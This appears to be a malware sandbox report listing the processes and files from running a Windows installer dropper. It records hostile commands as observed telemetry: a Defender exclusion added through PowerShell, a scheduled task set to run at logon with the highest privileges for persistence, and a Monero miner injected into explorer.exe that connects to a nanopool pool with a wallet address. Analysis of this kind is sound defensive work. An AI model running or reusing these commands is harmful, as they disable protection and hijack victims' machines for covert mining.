C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5456 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5456 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5180 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5144 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:1

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.main/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BJ+edII5Fll530cZ/+msGEWovb73nU3RrOnuNmRoFcg" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth

Network


Files

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\setup_install.exe

C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\libstdc++-6.dll

C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\libgcc_s_dw2-1.dll

C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\libcurlpp.dll

C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\libcurl.dll

C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\libwinpthread-1.dll

C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\setup_install.exe

C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\setup_install.exe


memory/3752-399-0x0000000140000000-0x0000000140786000-memory.dmp

memory/3752-395-0x0000000140000000-0x0000000140786000-memory.dmp

memory/3752-393-0x0000000140000000-0x0000000140786000-memory.dmp